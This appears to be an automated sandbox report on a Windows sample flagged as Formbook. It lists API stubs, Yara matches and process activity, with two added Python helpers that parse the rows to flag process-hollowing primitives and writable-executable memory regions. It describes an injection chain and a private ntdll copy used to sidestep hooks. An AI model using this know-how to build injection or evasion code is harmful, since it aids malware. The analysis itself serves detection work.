Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69D5A NtCreateFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69E0A NtReadFile
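The two listings above resolve the same set of native API stubs in the sample (process 2) and in NETSTAT.EXE (process 4), and in both cases the stubs sit outside the process's own image (0x00BBxxxx rather than the 0x0040xxxx image base in the sample; 0x038Axxxx in NETSTAT). Read together with the wntdll.pdb and OriginalFilename ntdll.dll strings that the report finds in those same processes further down, this is consistent with a second copy of ntdll mapped privately into each process, so the injected code reaches the native API without touching the system-loaded copy. The Python below is an added triage helper, not part of this report or of Joe Sandbox: it parses "Code function" rows of the shape shown above (the fused "exeCode function:" extraction form as well as a " | "-separated one), groups the resolved Nt* APIs by process image, and checks which process-injection primitives each image carries and in which 64 KiB regions the stubs live. The sample rows are a constructed subset of the rows above; the grouping of APIs into primitives and the region bucketing are this example's own choices, not the sandbox's signature logic.

```python
"""Triage helper for the 'Code function' rows of a sandbox report (added example)."""
import re
from collections import defaultdict

# Constructed subset of the rows listed above, kept in the fused form the
# extraction produced; the parser also accepts "Source: X | Code function: ...".
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB99A0 NtCreateSection,LdrInitializeThunk,2_2_00BB99A0
Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9780 NtMapViewOfSection,LdrInitializeThunk,2_2_00BB9780
Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00BB97A0
Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB98A0 NtWriteVirtualMemory,2_2_00BB98A0
Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9950 NtQueueApcThread,2_2_00BB9950
Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BBAD30 NtSetContextThread,2_2_00BBAD30
Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB9A20 NtResumeThread,LdrInitializeThunk,2_2_00BB9A20
Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB99D0 NtCreateProcessEx,2_2_00BB99D0
Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_0040102E2_2_0040102E
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9780 NtMapViewOfSection,LdrInitializeThunk,4_2_038A9780
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A97A0 NtUnmapViewOfSection,4_2_038A97A0
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A98A0 NtWriteVirtualMemory,4_2_038A98A0
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9950 NtQueueApcThread,4_2_038A9950
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9A20 NtResumeThread,4_2_038A9A20
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A9760 NtOpenProcess,4_2_038A9760
Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_00D69D60 NtCreateFile,4_2_00D69D60
"""

# <image> runs up to "Code function:"; the id is <pid>_<stage>_<8 hex digit address>.
ROW_RE = re.compile(
    r"Source:\s*(?P<image>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<pid>\d+)_(?P<stage>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s*(?P<apis>.*)$"
)

# This example's own grouping of native APIs into injection/hollowing steps.
PRIMITIVES = {
    "spawn_or_open_target": {"NtCreateProcessEx", "NtOpenProcess", "NtOpenThread"},
    "unmap_original_image": {"NtUnmapViewOfSection"},
    "stage_payload": {"NtAllocateVirtualMemory", "NtCreateSection",
                      "NtMapViewOfSection", "NtWriteVirtualMemory"},
    "hijack_execution": {"NtSetContextThread", "NtQueueApcThread"},
    "resume": {"NtResumeThread"},
}


def parse_rows(text):
    """Turn report rows into dicts; the trailing link-cell id is dropped from the API list."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if not m:
            continue
        tokens = [t.strip() for t in m["apis"].split(",")]
        apis = [t for t in tokens if t and t[0].isalpha()]   # drops "2_2_..." duplicates
        rows.append({"image": m["image"], "pid": int(m["pid"]), "stage": int(m["stage"]),
                     "addr": int(m["addr"], 16), "apis": apis})
    return rows


def assess(rows):
    """Per image: which primitives are present and whether the whole hollowing chain is."""
    by_image = defaultdict(set)
    for r in rows:
        by_image[r["image"]].update(r["apis"])
    report = {}
    for image, apis in by_image.items():
        present = {name: sorted(apis & fns) for name, fns in PRIMITIVES.items()}
        report[image] = {"primitives": present,
                         "hollowing_chain": all(present[name] for name in PRIMITIVES)}
    return report


def stub_regions(rows, granularity=0x10000):
    """64 KiB regions (by default) in which each image resolves Nt* stubs."""
    regions = defaultdict(set)
    for r in rows:
        if any(a.startswith("Nt") for a in r["apis"]):
            regions[r["image"]].add(r["addr"] & ~(granularity - 1))
    return {img: sorted(v) for img, v in regions.items()}


if __name__ == "__main__":
    parsed = parse_rows(SAMPLE_ROWS)
    for image, verdict in assess(parsed).items():
        print(image, "hollowing chain:", verdict["hollowing_chain"])
        for name, fns in verdict["primitives"].items():
            print("   ", name, fns)
    print(stub_regions(parsed))
```

Run against the full listing rather than the subset, the same code gives every row its home region, which makes the separation between the 0x0040xxxx image functions and the 0x00BBxxxx stub block in process 2 immediately visible.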
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_004046A7
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0040102E
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00401030
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00402D8D
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00402D90
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00409E40
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0041D669
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00409E3B
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0041D743
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_0041CFA3
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00402FB0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA20A0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8B090
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C428EC
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C420A8
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31002
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C4E824
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B94120
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7F900
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C422AE
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAEBB0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C3DBD2
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C303DA
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C42B28
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C3D466
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8841F
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C425DD
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA2581
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8D5E0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C41D55
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B70D20
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C42D07
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C42EF7
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B96E30
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C3D616
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C4DFCE
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C41FF1
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_0040102E
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_00401030
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0389EBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0392DBD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03932B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_039322AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0386F900
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03884120
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0387B090
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038920A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_039320A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_039328EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03921002
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0393E824
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03931FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03932EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0392D616
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03886E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03892581
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_039325DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0387D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03932D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03860D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_03931D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0387841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_0392D466
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D52D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D52D8D
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D59E40
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D59E3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D52FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D6CFA3
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D6D743
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 0386B150 appears 35 times
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: String function: 00B7B150 appears 35 times
Source: Y4U48592345670954.exe, 00000000.00000003.653543330.000000001F0BF000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Y4U48592345670954.exe
Source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamenetstat.exej% vs Y4U48592345670954.exe
Source: Y4U48592345670954.exe, 00000002.00000002.689550397.0000000000C6F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Y4U48592345670954.exe
Source: Y4U48592345670954.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
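Each Source above is a memory-dump identifier. For the .sdmp form the dotted fields read, in order, as process index, dump stage, dump id, base address, memory protection and region type; for the .unpack form they read as process index, stage, original file name, base address and dump index, with an optional .raw marker. Reading the protection field as the Win32 PAGE_* constant (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE) is an assumption of this example, checked only against the values above. The Python below is an added example, not part of the report or of Joe Sandbox: it parses those match rows, decodes the identifiers, and summarises per process which rules fired, whether two independent rule authors agree, and which matched regions were both writable and executable at dump time. The sample rows are a constructed subset of the rows above, with the long rule metadata shortened.

```python
"""Decode Yara-match rows and memory-dump identifiers from a sandbox report (added example)."""
import re

# Constructed subset of the 'Matched rule' rows above (metadata shortened).
SAMPLE_MATCHES = """
Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, description = autogenerated rule brought to you by yara-signator, cape_type = Formbook Payload
Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, cape_type = Formbook Payload
Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan
Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, cape_type = Formbook Payload
Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory
Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, cape_type = Formbook Payload
Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory
Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory
"""

# Accepts both the fused "MEMORYMatched rule:" form and a " | "-separated one.
MATCH_RE = re.compile(
    r"Source:\s*(?P<src>\S+),\s*type:\s*(?P<type>[A-Z]+?)\s*\|?\s*"
    r"Matched rule:\s*(?P<rule>\S+)\s*(?P<meta>.*)$"
)
SDMP_RE = re.compile(
    r"^(?P<pid>\d+)\.(?P<stage>\d+)\.(?P<dumpid>\d+)\.(?P<base>[0-9A-Fa-f]+)"
    r"\.(?P<prot>[0-9A-Fa-f]+)\.(?P<kind>\d+)\.sdmp$"
)
UNPACK_RE = re.compile(
    r"^(?P<pid>\d+)\.(?P<stage>\d+)\.(?P<name>.+)\.(?P<base>[0-9A-Fa-f]+)"
    r"\.(?P<idx>\d+)(?:\.raw)?\.unpack$"
)

# Win32 page-protection constants; mapping the sdmp field onto them is this
# example's assumption.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}


def parse_meta(text):
    """'key = value, key = value' -> dict (values may themselves contain dashes or spaces)."""
    out = {}
    for part in text.split(", "):
        key, sep, value = part.partition(" = ")
        if sep:
            out[key.strip()] = value.strip()
    return out


def parse_matches(text):
    records = []
    for line in text.splitlines():
        m = MATCH_RE.search(line)
        if not m:
            continue
        rec = {"source": m["src"], "type": m["type"], "rule": m["rule"],
               "meta": parse_meta(m["meta"]), "pid": None, "base": None, "prot": None}
        d = SDMP_RE.match(m["src"])
        u = None if d else UNPACK_RE.match(m["src"])
        if d:
            rec.update(pid=int(d["pid"]), base=int(d["base"], 16), prot=int(d["prot"], 16))
        elif u:
            rec.update(pid=int(u["pid"]), base=int(u["base"], 16))
        records.append(rec)
    return records


def summarize(records):
    """Per process index: rules, authors, region protections, RWX regions, corroboration."""
    out = {}
    for r in records:
        d = out.setdefault(r["pid"], {"rules": set(), "authors": set(),
                                      "regions": {}, "unpacked_pe": set()})
        d["rules"].add(r["rule"])
        d["authors"].add(r["meta"].get("author", "?"))
        if r["type"] == "MEMORY":
            d["regions"][r["base"]] = PAGE_PROTECT.get(r["prot"], hex(r["prot"]))
        else:
            d["unpacked_pe"].add(r["source"])
    for d in out.values():
        d["rwx_regions"] = sorted(b for b, p in d["regions"].items()
                                  if p == "PAGE_EXECUTE_READWRITE")
        d["corroborated"] = len(d["authors"]) >= 2   # two independent rule sets agree
    return out


if __name__ == "__main__":
    for pid, d in sorted(summarize(parse_matches(SAMPLE_MATCHES)).items()):
        print(f"process {pid}: rules={sorted(d['rules'])} corroborated={d['corroborated']} "
              f"rwx={[hex(b) for b in d['rwx_regions']]}")
```

The RWX regions are the ones worth carving first: on this page they are the 0x5C0000 / 0x590000 / 0x400000 regions of process 2 and 0xD50000 / 0x3110000 of process 4, which line up with the stub and payload addresses seen in the function listings.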
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/3@4/2
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_01
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | File created: C:\Users\user\AppData\Local\Temp\nskA2DC.tmp
Source: Y4U48592345670954.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Y4U48592345670954.exe | Virustotal: Detection: 17%
Source: Y4U48592345670954.exe | ReversingLabs: Detection: 16%
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | File read: C:\Users\user\Desktop\Y4U48592345670954.exe
Source: unknown | Process created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe'
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Process created: C:\Users\user\Desktop\Y4U48592345670954.exe 'C:\Users\user\Desktop\Y4U48592345670954.exe'
